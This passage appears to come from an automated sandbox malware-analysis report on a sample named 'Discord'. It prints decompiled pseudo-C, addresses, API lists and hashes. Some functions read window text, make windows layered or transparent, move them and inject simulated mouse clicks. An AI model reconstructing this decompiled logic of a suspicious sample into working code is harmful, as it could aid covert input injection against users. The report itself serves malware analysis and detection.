					L6DE8EBA0();
					_t24 = _t21;
					 *_t35 =  *((intOrPtr*)(_t34 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83b32
0x6de83a66
0x6de83a6c
0x6de83a71
0x6de83a78
0x6de83a7e
0x6de83a83
0x6de83a8a
0x6de83a90
0x6de83a95
0x6de83a9c
0x6de83aa2
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE83A6C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE83A7E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE83A90
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE83AA2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: d2aa89f3bed98c15c35aa6f656ba51dd92ec5fdfcbb789ea808b5d1a2f6ae074
Instruction ID: 87b138e553b820f93ab99d32b4eba0d710ce4873ff6b0c1b7a6f9fb02fbf623c
Opcode Fuzzy Hash: d2aa89f3bed98c15c35aa6f656ba51dd92ec5fdfcbb789ea808b5d1a2f6ae074
Instruction Fuzzy Hash: B20108B4948A158FC710EF18D888B9CF7F8FF98214F21859EA54EE7251DB306A84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00401800 Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401800(intOrPtr* _a4) {
				char _v12;
				intOrPtr _v24;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr* _t18;
				intOrPtr _t19;
				intOrPtr* _t22;

				_t18 = _a4;
				_t12 =  *((intOrPtr*)( *_t18));
				if(_t12 > 0xc0000091) {
					if(_t12 == 0xc0000094) {
						_t19 = 0;
						L12:
						_v24 = 0;
						 *_t22 = 8;
						L004026F0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 8;
							L004026F0();
							if(_t19 != 0) {
								E00401E60(_t12);
							}
							L15:
							_t13 = 0xffffffff;
							L16:
							return _t13;
						}
						if(_t12 == 0) {
							L9:
							_t13 =  *0x406058;
							if(_t13 == 0) {
								goto L16;
							}
							_a4 = _t18;
							_t22 =  &_v12;
							_pop(_t18);
							goto __eax;
						}
						 *_t22 = 8;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000096) {
						L19:
						_v24 = 0;
						 *_t22 = 4;
						L004026F0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 4;
							L004026F0();
							goto L15;
						}
						if(_t12 == 0) {
							goto L9;
						}
						 *_t22 = 4;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000093) {
						L17:
						_t19 = 1;
						goto L12;
					}
					goto L9;
				}
				if(_t12 >= 0xc000008d) {
					goto L17;
				}
				if(_t12 != 0xc0000005) {
					if(_t12 != 0xc000001d) {
						goto L9;
					}
					goto L19;
				}
				_v24 = 0;
				 *_t22 = 0xb;
				L004026F0();
				if(_t12 == 1) {
					_v24 = 1;
					 *_t22 = 0xb;
					L004026F0();
					goto L15;
				}
				if(_t12 == 0) {
					goto L9;
				}
				 *_t22 = 0xb;
				 *_t12();
				goto L15;
			}

0x00401808
0x0040180d
0x00401814
0x0040185d
0x00401881
0x00401883
0x00401883
0x0040188b
0x00401892
0x0040189a
0x00401926
0x0040192e
0x00401935
0x0040193c
0x00401942
0x00401942
0x004018ad
0x004018ad
0x004018b2
0x004018b8
0x004018b8
0x004018a2
0x0040186d
0x0040186d
0x00401874
0x00000000
0x00000000
0x00401876
0x00401879
0x0040187c
0x0040187f
0x0040187f
0x004018a4
0x004018ab
0x00000000
0x004018ab
0x00401864
0x004018ce
0x004018ce
0x004018d6
0x004018dd
0x004018e5
0x00401910
0x00401918
0x0040191f
0x00000000
0x0040191f
0x004018e9
0x00000000
0x00000000
0x004018eb
0x004018f2
0x00000000
0x004018f2
0x0040186b
0x004018c0
0x004018c0
0x00000000
0x004018c0
0x00000000
0x0040186b
0x0040181b
0x00000000
0x00000000
0x00401826
0x004018cc
0x00000000
0x00000000
0x00000000
0x004018cc
0x0040182c
0x00401834
0x0040183b
0x00401843
0x004018f6
0x004018fe
0x00401905
0x00000000
0x00401905
0x0040184b
0x00000000
0x00000000
0x0040184d
0x00401854
0x00000000

APIs

signal.MSVCRT ref: 0040183B
signal.MSVCRT ref: 00401892
signal.MSVCRT ref: 004018DD
signal.MSVCRT ref: 00401905

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 2e1ae485920a6ded778d13b8df8466ba0a07e3ea08f322cda4d2c99536fae5e1
Instruction ID: 2abf589da32c128811f16301f94d50544c3dc7d8015525770b39e1a8c61db358
Opcode Fuzzy Hash: 2e1ae485920a6ded778d13b8df8466ba0a07e3ea08f322cda4d2c99536fae5e1
Instruction Fuzzy Hash: 19216F729042008AEB207FA5C54436A77E0BF45754F15892BD8C4E73E1C77D8A84AB5B

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94A30 Relevance: 9.1, APIs: 6, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E6DE94A30(void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v52;
				char* _v56;
				char _v76;
				intOrPtr _v88;
				char* _v100;
				void* _t24;
				intOrPtr* _t27;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t38;
				void* _t44;
				intOrPtr* _t47;
				intOrPtr* _t50;
				void* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;

				_t38 = __ecx;
				_t53 = _t52 - 0x2c;
				_t50 = __imp___errno;
				_t33 = _a12;
				_t47 = _a16;
				 *((intOrPtr*)( *_t50(_t32, __esi, __edi, __ebp))) = 0;
				 *_t53 = _t33;
				_v52 = _a20;
				_v56 =  &_v32;
				_t24 = _a4();
				if(_v32 == _t33) {
					L6:
					 *_t53 = _a8;
					L6DE8DD98();
					0;
					_push(_t33);
					_t34 = _t38;
					_t54 = _t53 - 0x28;
					_v76 = 0;
					_v100 =  &_v76;
					_t27 =  *((intOrPtr*)(_t38 + 4));
					 *_t54 = _t27;
					L6DE8DC38();
					_t55 = _t54 - 8;
					if(_t27 == 0) {
						 *_t55 = 0xc;
						L6DE8DC40();
						 *_t27 = 0x6de98988;
						 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t34 + 8));
						 *((intOrPtr*)(_t27 + 4)) = _v88;
						return _t27;
					} else {
						 *((intOrPtr*)(_t34 + 8)) = _t27;
						return 0;
					}
				} else {
					_t44 = _t24;
					if( *((intOrPtr*)( *_t50())) == 0x22) {
						 *_t53 = _a8;
						L6DE8DD90();
						goto L6;
					} else {
						if(_t47 != 0) {
							 *_t47 = _v32 - _t33;
						}
						return _t44;
					}
				}
			}

0x6de94a30
0x6de94a34
0x6de94a37
0x6de94a3d
0x6de94a41
0x6de94a47
0x6de94a51
0x6de94a54
0x6de94a5c
0x6de94a60
0x6de94a68
0x6de94a9c
0x6de94aa0
0x6de94aa3
0x6de94aae
0x6de94ab0
0x6de94ab1
0x6de94ab3
0x6de94aba
0x6de94ac2
0x6de94ac6
0x6de94ac9
0x6de94acc
0x6de94ad1
0x6de94ad6
0x6de94ae2
0x6de94ae9
0x6de94af8
0x6de94afe
0x6de94b01
0x6de94b08
0x6de94ad8
0x6de94ad8
0x6de94ae1
0x6de94ae1
0x6de94a6a
0x6de94a6a
0x6de94a71
0x6de94a94
0x6de94a97
0x00000000
0x6de94a73
0x6de94a75
0x6de94a7d
0x6de94a7d
0x6de94a88
0x6de94a88
0x6de94a71

APIs

_errno.MSVCRT ref: 6DE94A45
_errno.MSVCRT ref: 6DE94A6C
_ZSt20__throw_out_of_rangePKc.LIBSTDC++-6 ref: 6DE94A97
_ZSt24__throw_invalid_argumentPKc.LIBSTDC++-6 ref: 6DE94AA3
GdipCloneImage.GDIPLUS ref: 6DE94ACC
GdipAlloc.GDIPLUS ref: 6DE94AE9

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Gdip_errno$AllocCloneImageSt20__throw_out_of_rangeSt24__throw_invalid_argument
String ID:
API String ID: 176361401-0
Opcode ID: 7ad14832b34f368b9b9dea47b774fcbdce6220e06fa6d5fc85ff16c775a913b0
Instruction ID: 347d480e1fdfabc8f405660c3bb63880e0e423eeaf7c22252f02b814673b6171
Opcode Fuzzy Hash: 7ad14832b34f368b9b9dea47b774fcbdce6220e06fa6d5fc85ff16c775a913b0
Instruction Fuzzy Hash: 812147B59093018FC704EF75C58451ABBF4EF89214F25892EE9988B300EB75D845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93A40 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE93ADA

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_
String ID:
API String ID: 418774267-0
Opcode ID: 300f1b49967e88ca9b03d6da0410eabb75b7da386be13de3d6180bb893ef0b0b
Instruction ID: a7bbc175a4b4ce8e72c9f2d93432642ac18e52b395308cd6074827de4fb1ecf1
Opcode Fuzzy Hash: 300f1b49967e88ca9b03d6da0410eabb75b7da386be13de3d6180bb893ef0b0b
Instruction Fuzzy Hash: 9821A5B150A6028BC304FFBC8598519BBA4EF81365F21477DDD598F180FF36C9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8D589 Relevance: 9.1, APIs: 6, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E6DE8D589(void* __edi, void* __esi, long* _a4, long _a8, int _a12, CHAR* _a16, CHAR* _a20, long _a24, signed int _a32, long _a36, int _a40, long _a44, void* _a48, char* _a52, char* _a56, long _a60, signed long long _a64, signed long long _a72, long _a80, char _a84, CHAR* _a88, signed short _a90, CHAR* _a92, signed int _a94, long _a108, long long _a112, signed long long _a120, struct tagRECT _a124, intOrPtr _a128, long _a132, long _a136) {
				char* _v0;
				void* _v16;
				void* _v20;
				CHAR* _v24;
				char _v28;
				CHAR* _v48;
				CHAR* _v52;
				void* _v56;

				while(1) {
					L60:
					__eflags = __esi - __edi;
					if(__esi == __edi) {
						goto L74;
					}
					do {
						__ebx =  *__esi;
						__ecx = 0x6de9eaac;
						_v0 = "test";
						L6DE8DD68();
						__esp = __esp - 4;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = GetWindowLongA(__ebx, 0xffffffec);
							__esp = __esp - 8;
							 *0x6de9e85c = __eax;
							__eax = __eax | 0x00080080;
							__eflags = __eax;
							__eax = SetWindowLongA(__ebx, 0xffffffec, __eax);
							__esp = __esp - 0xc;
							_a8 = 2;
							_a4 = 1;
							_v0 = 0;
							 *__esp = __ebx;
							__imp__SetLayeredWindowAttributes();
							__esp = __esp - 0x10;
						}
						 *__esp = __ebx;
						__esi = __esi + 4;
						L6DE8DC70();
						 &_a124 = GetWindowRect(__ebx,  &_a124);
						__esp = __esp - 8;
						__eax = _a136;
						__eax = _a136 - _a128;
						asm("fnstcw word [esp+0x5e]");
						_a20 = 1;
						_a16 = 0;
						_a12 = 0;
						_v0 = 0xffffffff;
						 *__esp = __ebx;
						__eax = __eax >> 0x1f;
						__eax = __eax + (__eax >> 0x1f);
						_a36 = __eax;
						__eax = _a90 & 0x0000ffff;
						asm("fild dword [esp+0x28]");
						asm("fsubr qword [0x6de9e790]");
						_a88 = __ax;
						__eax = _a132;
						__eax = _a132 - _a124.left;
						asm("fldcw word [esp+0x5c]");
						asm("fistp dword [esp+0xc]");
						asm("fldcw word [esp+0x5e]");
						__eax = __eax >> 0x1f;
						__eax = __eax + (__eax >> 0x1f);
						__eax = __eax >> 1;
						_a4 = __eax;
						__eax = _a40();
						__esp = __esp - 0x1c;
						__eflags = __edi - __esi;
					} while (__edi != __esi);
					__eax =  *0x6de9e814;
					__esi =  *0x6de9e7d8;
					while(1) {
						L48:
						__edx =  *0x6de9e7fc;
						__eflags = __eax;
						 *0x6de9e7dc = __esi;
						 *0x6de9e800 =  *0x6de9e7fc;
						if(__eax == 0) {
							 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
							__esp = __esp - 8;
						}
						while(1) {
							L13:
							__eax = 0x6de9e87c->left;
							asm("fnstcw word [esp+0x5e]");
							__edx = _a94 & 0x0000ffff;
							__ecx =  *0x6de9e888;
							_a40 = __eax;
							asm("fild dword [esp+0x28]");
							_a92 = __dx;
							__edx =  *0x6de9e880;
							asm("fsubr dword [0x6de9814c]");
							__ecx =  *0x6de9e888 - __edx;
							__ecx =  *0x6de9e888 - __edx - 0x32;
							__eflags = __ecx;
							_a40 = __ecx;
							_a32 = _a32 / st0;
							asm("fxch st0, st1");
							asm("fldcw word [esp+0x5c]");
							asm("fistp dword [esp+0x58]");
							asm("fldcw word [esp+0x5e]");
							__ebx = _a88;
							asm("fild dword [esp+0x28]");
							_a40 = __edx;
							_a48 = __ebx;
							asm("fsubr qword [0x6de9e790]");
							asm("fild dword [esp+0x28]");
							_a40 = 1;
							asm("fsubp st1, st0");
							__fp0 = _a32 / st0 / st1;
							asm("fldcw word [esp+0x5c]");
							asm("fistp dword [esp+0x58]");
							asm("fldcw word [esp+0x5e]");
							__edi = _a88;
							asm("fld1");
							asm("fxch st0, st1");
							__esi = __edi;
							asm("fucomip st0, st1");
							st0 = __fp0;
							if(__ecx >= 0) {
								while(1) {
									L17:
									__ecx =  *0x6de9e814;
									__eax = __ebx + __eax;
									__edx = __esi + __edx;
									 *0x6de9e894 = __eax;
									 *0x6de9e898 = __edx;
									__eflags =  *0x6de9e814;
									if( *0x6de9e814 == 0) {
										_a8 = __eax;
										__eax =  *0x6de9e868;
										_a24 = 1;
										_a20 = 0;
										_a16 = 0;
										_a12 = __edx;
										_a4 = 0xffffffff;
										_v0 =  *0x6de9e868;
										__eax = _a44();
										__esp = __esp - 0x1c;
									}
									_v0 = 1;
									__esi = __esi + __edi;
									Sleep(??);
									__esp = __esp - 4;
									_a40 = _a40 + 1;
									__ebx = __ebx + _a48;
									__eflags = __ebx;
									asm("fild dword [esp+0x28]");
									__fp0 = _a32;
									asm("fucomip st0, st1");
									st0 = __fp0;
									if(__ebx < 0) {
										goto L19;
									}
									L16:
									__eax = 0x6de9e87c->left;
									__edx =  *0x6de9e880;
								}
							}
							L14:
							L19:
							__eax =  *0x6de9e868;
							__ebx = 4;
							_v0 =  *0x6de9e868;
							L6DE8DC70();
							__esi = IsWindow;
							__edi = _a56;
							_a40 = 4;
							while(1) {
								__edx =  *0x6de9e814;
								__eflags =  *0x6de9e814;
								if( *0x6de9e814 != 0) {
									break;
								}
								Sleep(0x1770);
								__esp = __esp - 4;
								_v0 = __edi;
								L6DE8DD20();
								__eax =  *0x6de9e868;
								__eax = GetWindowTextLengthA( *0x6de9e868);
								_t79 = __eax + 1; // 0x1
								__ebx = _t79;
								__esp = __esp - 4;
								_v0 = __ebx;
								L6DE8DD50();
								_a4 = __eax;
								__edi = __eax;
								__eax =  *0x6de9e868;
								_a8 = __ebx;
								_v0 =  *0x6de9e868;
								GetWindowTextA(??, ??, ??) =  *0x6de9e868;
								__esp = __esp - 0xc;
								__eax = IsWindow( *0x6de9e868);
								__esp = __esp - 4;
								__eflags = __eax;
								if(__eax == 0) {
									L33:
									__eflags =  *0x6de9e760 - 1;
									_a56 = __edi;
									if( *0x6de9e760 == 1) {
										__eax = E6DE8A200();
									}
									__eax = _a52;
									_v0 = _a52;
									L6DE8DD20();
									__eax = _a56;
									_v0 = _a56;
									L6DE8DD20();
									_a60 = 1;
									goto L1;
								} else {
									__eax = strstr(__edi, 0x6de9e6b8);
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										__eax = strstr(__edi, 0x6de9e6a8);
										__eflags = __eax;
										if(__eax != 0) {
											goto L33;
										} else {
											__eax = _a52;
											__eax = strstr(_a52, __edi);
											__eflags = __eax;
											if(__eax != 0) {
												L27:
												__eax =  *0x6de9e814;
												_a56 = __edi;
												__eflags =  *0x6de9e814;
												if( *0x6de9e814 != 0) {
													L67:
													__eax = _a52;
													_v0 = _a52;
													L6DE8DD20();
													__eax = _a56;
													_v0 = _a56;
													L6DE8DD20();
													_a60 = 0;
													goto L1;
												} else {
													_t89 =  &_a84;
													 *_t89 = _a84 - 1;
													__eflags =  *_t89;
													if( *_t89 != 0) {
														asm("fldz");
														__eax = _a80;
														_v0 = 0x64;
														_a108 = 0;
														asm("fst qword [esp+0x70]");
														_a12 = _a80;
														__eax =  &_a112;
														_a8 =  &_a112;
														__eax =  &_a108;
														_a4 =  &_a108;
														_a120 = __fp0;
														__eax = E6DE86370();
														Sleep(0x7d0);
														__edi =  *0x6de9e814;
														__esp = __esp - 4;
														__eflags =  *0x6de9e814;
														if( *0x6de9e814 != 0) {
															L70:
															__eax = _a52;
															_v0 = _a52;
															L6DE8DD20();
															__eax = _a56;
															_v0 = _a56;
															L6DE8DD20();
															__eflags =  *0x6de9e760 - 1;
															 *0x6de9e814 = 2;
															if( *0x6de9e760 == 1) {
																goto L71;
															}
															goto L1;
														} else {
															__esi = _a108;
															__eflags = _a108;
															if(_a108 == 0) {
																goto L70;
															} else {
																__eax = _a52;
																_v0 = _a52;
																L6DE8DD20();
																__eax =  *0x6de9e868;
																__eax = GetWindowTextLengthA( *0x6de9e868);
																_t12 = __eax + 1; // 0x1
																__ebx = _t12;
																__esp = __esp - 4;
																_v0 = __ebx;
																L6DE8DD50();
																_a52 = __eax;
																_a4 = __eax;
																__eax =  *0x6de9e868;
																_a8 = __ebx;
																_v0 =  *0x6de9e868;
																GetWindowTextA(??, ??, ??) =  *0x6de9e868;
																__esp = __esp - 0xc;
																_v0 =  *0x6de9e868;
																L6DE8DC70();
																Sleep(0x3e8);
																__eax =  *0x6de9e868;
																__esp = __esp - 4;
																_v0 =  *0x6de9e868;
																L6DE8DCA0();
																__ebx =  *0x6de9e814;
																__eflags =  *0x6de9e814;
																if(__eflags == 0) {
																	 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
																	__esp = __esp - 8;
																}
																__fp0 = _a64;
																asm("fnstcw word [esp+0x5e]");
																__eax = _a94 & 0x0000ffff;
																_v0 = 0x3e8;
																__fp0 = _a64 + _a112;
																_a92 = __ax;
																__fp0 = (_a64 + _a112) *  *0x6de9e780;
																asm("fsubr dword [0x6de98138]");
																asm("fild dword [0x6de9e87c]");
																asm("fsubp st1, st0");
																_a32 = _a32 / st0;
																asm("fxch st0, st1");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x30]");
																asm("fldcw word [esp+0x5e]");
																_a72 = _a72 + _a120;
																__fp0 = (_a72 + _a120) *  *0x6de9e778;
																asm("fsubr qword [0x6de9e790]");
																asm("fild dword [0x6de9e880]");
																asm("fsubp st1, st0");
																asm("fdivrp st1, st0");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edi = _a88;
																Sleep(??);
																__esp = __esp - 4;
																asm("fld1");
																__fp0 = _a32;
																asm("fucomip st0, st1");
																st0 = _a32;
																if(__eflags < 0) {
																	__eax = SetWindowPos;
																	_a44 = SetWindowPos;
																} else {
																	__eax = SetWindowPos;
																	__ebx = __edi;
																	__esi = _a48;
																	_a40 = 1;
																	_a44 = SetWindowPos;
																	do {
																		__eax = 0x6de9e87c->left;
																		__ecx =  *0x6de9e880;
																		__edx =  *0x6de9e814;
																		__eax = __esi + 0x6de9e87c->left;
																		__ecx = __ebx +  *0x6de9e880;
																		__eflags =  *0x6de9e814;
																		 *0x6de9e894 = __eax;
																		 *0x6de9e898 = __ecx;
																		if( *0x6de9e814 == 0) {
																			_a8 = __eax;
																			__eax =  *0x6de9e868;
																			_a24 = 1;
																			_a20 = 0;
																			_a16 = 0;
																			_a12 = __ecx;
																			_a4 = 0xffffffff;
																			_v0 =  *0x6de9e868;
																			__eax = _a44();
																			__esp = __esp - 0x1c;
																		}
																		_v0 = 1;
																		__ebx = __ebx + __edi;
																		Sleep(??);
																		__esp = __esp - 4;
																		_a40 = _a40 + 1;
																		__esi = __esi + _a48;
																		__eflags = __esi;
																		asm("fild dword [esp+0x28]");
																		__fp0 = _a32;
																		asm("fucomip st0, st1");
																		st0 = _a32;
																	} while (__esi >= 0);
																}
																__fp0 = _a64;
																asm("fnstcw word [esp+0x5e]");
																__eax = _a94 & 0x0000ffff;
																_a24 = 1;
																_a20 = 0;
																__fp0 = _a64 + _a112;
																_a16 = 0;
																_a4 = 0xffffffff;
																_a92 = __ax;
																__fp0 = (_a64 + _a112) *  *0x6de9e780;
																asm("fsubr dword [0x6de98138]");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__eax = _a88;
																__fp0 = _a72;
																 *0x6de9e894 = __eax;
																_a8 = __eax;
																__eax =  *0x6de9e868;
																__fp0 = _a72 + _a120;
																_v0 =  *0x6de9e868;
																__fp0 = (_a72 + _a120) *  *0x6de9e778;
																asm("fsubr qword [0x6de9e790]");
																asm("fldcw word [esp+0x5c]");
																asm("fistp dword [esp+0x58]");
																asm("fldcw word [esp+0x5e]");
																__edx = _a88;
																 *0x6de9e898 = __edx;
																_a12 = __edx;
																_a44() =  *0x6de9e7d8;
																__esp = __esp - 0x1c;
																__esi = EnumWindows;
																_v24 = 0;
																_v28 = E6DE889C0;
																 *0x6de9e7dc =  *0x6de9e7d8;
																__eax =  *0x6de9e7fc;
																 *0x6de9e800 =  *0x6de9e7fc;
																__eax = EnumWindows(??, ??);
																__esp = __esp - 8;
																Sleep(0xc8);
																__eax =  *0x6de9e868;
																__esp = __esp - 4;
																 *__esp =  *0x6de9e868;
																L6DE8DC70();
																__ecx =  *0x6de9e814;
																__eflags =  *0x6de9e814;
																if( *0x6de9e814 == 0) {
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__ebx = mouse_event;
																	__eax = mouse_event(2, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__eax = mouse_event(4, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x64);
																	__esp = __esp - 4;
																	__eax = mouse_event(2, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	__eax = mouse_event(4, 0, 0, 0, 0);
																	__esp = __esp - 0x14;
																	__ebx = 0x493df;
																	Sleep(0x32);
																	__esp = __esp - 4;
																	_v48 = 0;
																	__eax = EnumWindows(E6DE88B20);
																	__esp = __esp - 8;
																	while(1) {
																		__edi =  *0x6de9e814;
																		__eflags =  *0x6de9e814;
																		if( *0x6de9e814 != 0) {
																			break;
																		}
																		_v52 = 0;
																		__eax = EnumWindows(E6DE88B20);
																		__esp = __esp - 8;
																		__ebx = __ebx - 1;
																		__eflags = __ebx;
																		if(__ebx != 0) {
																			continue;
																		}
																		break;
																	}
																	__ebx =  *0x6de9e7dc;
																	__esi =  *0x6de9e7d8;
																	__eflags = __ebx - __esi;
																	if(__ebx == __esi) {
																		__esi = __ebx;
																	} else {
																		__edi = __ebx;
																		__ecx = 0x1f;
																		__edx = __ebx;
																		__edi = __ebx - __esi;
																		__edi = __edi >> 2;
																		asm("bsr eax, eax");
																		__eax = __edi >> 0x00000002 ^ 0x0000001f;
																		__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
																		__eax = __esi;
																		__ecx = 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f);
																		__eax = E6DE8A040(__esi, 0x1f - (__edi >> 0x00000002 ^ 0x0000001f) + 0x1f - (__edi >> 0x00000002 ^ 0x0000001f), __ebx);
																		__eflags = __edi - 0x43;
																		if(__edi > 0x43) {
																			__edi = __esi + 0x40;
																			_v52 = 0;
																			__eax = E6DE95290(__esi, __edi);
																			__eflags = __ebx - __edi;
																			if(__ebx == __edi) {
																				goto L41;
																			} else {
																				__esi =  *__edi;
																				__edx =  *(__edi - 4);
																				__eax = __edi - 4;
																				__eflags = __edx - __esi;
																				if(__edx > __esi) {
																					goto L55;
																				} else {
																					L58:
																					__eax = __edi;
																					__edi =  &(__edi[4]);
																					__eflags = __ebx - __edi;
																					 *__eax = __esi;
																					if(__ebx != __edi) {
																						L57:
																						__esi =  *__edi;
																						__edx =  *(__edi - 4);
																						__eax = __edi - 4;
																						__eflags = __edx - __esi;
																						if(__edx > __esi) {
																							while(1) {
																								L55:
																								 *(__eax + 4) = __edx;
																								__edx =  *(__eax - 4);
																								__ecx = __eax - 4;
																								__eflags = __esi - __edx;
																								if(__esi >= __edx) {
																									break;
																								}
																								__eax = __ecx;
																							}
																							__edi =  &(__edi[4]);
																							 *__eax = __esi;
																							__eflags = __ebx - __edi;
																							if(__ebx == __edi) {
																								goto L41;
																							} else {
																								goto L57;
																							}
																						} else {
																							goto L58;
																						}
																					} else {
																						goto L41;
																					}
																				}
																			}
																			L48:
																			__edx =  *0x6de9e7fc;
																			__eflags = __eax;
																			 *0x6de9e7dc = __esi;
																			 *0x6de9e800 =  *0x6de9e7fc;
																			if(__eax == 0) {
																				 *0x6de9e868 = GetWindowRect( *0x6de9e868, 0x6de9e87c);
																				__esp = __esp - 8;
																			}
																			goto L13;
																		} else {
																			_v52 = 0;
																			__eax = E6DE95290(__esi, __ebx);
																		}
																		L41:
																		__esi =  *0x6de9e7dc;
